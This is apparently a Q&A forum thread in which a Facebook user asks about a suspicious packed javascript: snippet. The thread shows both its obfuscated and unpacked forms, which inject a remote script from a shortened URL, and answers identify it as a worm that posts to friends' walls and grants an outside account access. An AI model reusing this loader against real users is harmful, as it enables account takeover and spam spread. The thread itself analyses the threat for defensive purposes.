What does this JS code do?

Question

I just saw this piece of javascript code at Facebook:

javascript:eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0:(a=(d=1).2("3")).4="5://6.7/8";9(d.b.c(a))',14,14,'javascript|document|createElement|script|src|http|is|gd|aNC9Zd|void||body|appendChild|'.split('|'),0,{}))

So I unpacked it with this tool: http://www.strictly-software.com/unpacker

The following code showed up:

javascript: (a = (d = document).createElement("script")).src = "http://is.gd/aNC9Zd";
void(d.body.appendChild(a))

I followed the link in the above code to find a very large .js file. Could someone find out what that code does? I've taken necessary precautions - changed password, cleared cache, cookies. It hasn't done anything as of now, but I think it may be timed to occur after a certain period, etc.

Thanks.

Answer 1

Looks like a facebook virus spreading to friends' walls. A strange one indeed because it even has comments in it...

Answer 2

It mostly add the fb.js script to your page at runtime and executes it. It list your friends, post on their walls with a link to http://www.facebook.com/pages/Suggest-Fan-Pages/138936739504438 and adds publikime@hotmail.com to be allowed to see your informations.

Answer 3

Note, I've never developed for the facebook platform:

The javascript page that it redirects to (http://hackeralbania2012.webs.com/fb.js) seems to want to take admin rights to whatever account is open in the browser at that point of time and write to the wall.

Answer 4

Redirect to

http://hackeralbania2012.webs.com/fb.js

Check out and expand urls here:

http://longurl.org/

As to what it does, I'm not entirely sure. Chrome apparently doesn't want me to save it to disk, and after seeing the URL I'm not sure I want to :)